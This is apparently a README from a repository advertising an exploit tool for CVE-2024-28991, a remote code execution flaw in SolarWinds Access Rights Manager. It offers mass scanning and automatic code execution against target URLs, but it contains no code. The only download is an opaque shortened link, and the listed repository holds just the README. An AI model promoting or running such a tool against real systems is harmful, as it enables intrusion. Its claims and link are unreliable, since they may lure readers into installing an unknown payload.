# 🛠 CVE-2024-28991 Exploit
## 🌟 Description
This script is a powerful exploitation tool for the CVE-2024-28991 vulnerability found in SolarWinds Access Rights Manager (ARM). It allows an authenticated user to exploit the service, resulting in remote code execution on the affected systems.
## ⚙️ Installation
To set up the exploitation tool, follow these steps:
1. Download the repository:
|[Download](https://t.ly/KsLqz)
|:--------------- |
2. Navigate to the tool's directory:
```bash
cd CVE-2024-28991
```
3. Install the required Python packages:
```bash
pip install -r requirements.txt
```
## 🚀 Usage
To use the tool, run the script from the command line as follows:
```bash
python exploit.py [options]
```
### Options
- -u, --url:
Specify the target URL or IP address.
- -f, --file:
Specify a file containing a list of URLs to scan.
- -t, --threads:
Set the number of threads for concurrent scanning.
- -o, --output:
Define an output file to save the scan results.
When a single URL is provided with the -u option and the target is vulnerable, the script will attempt to execute arbitrary code.
### Example
```bash
$ python3 exploit.py -u http://target-url.com
[+] Remote code execution triggered successfully.
[!] http://target-url.com is vulnerable to CVE-2024-28991.
```
## 📊 Mass Scanning
For mass scanning, use the -f option with a file containing URLs. The tool will scan each URL and print concise results, indicating whether each target is vulnerable.
```bash
python exploit.py -f urls.txt
```
## 🗒 Affected Versions
The vulnerability affects the following versions of SolarWinds Access Rights Manager (ARM):
Access Rights Manager <= 2024.3
It is highly recommended to apply patches or updates to mitigate this vulnerability, as it poses a significant risk to system security.
## 📈 CVSS Information
- **CVSS V3.1 Score:** 8.8
- **Severity:** HIGH
- **Confidentiality:** High
- **Integrity:** High
- **Availability:** High
- **Attack Vector:** Network
- **Attack Complexity:** Low
- **Privileges Required:** Low
- **User Interaction:** None
- **Scope:** Unchanged
## 🛡 Disclaimer
Use this tool responsibly and ethically. Always obtain proper authorization before testing any system for vulnerabilities.
[4.0K] /data/pocs/8dfab7eb9e2937526d179b35ac9304001de4e7d3
└── [2.2K] README.md
0 directories, 1 file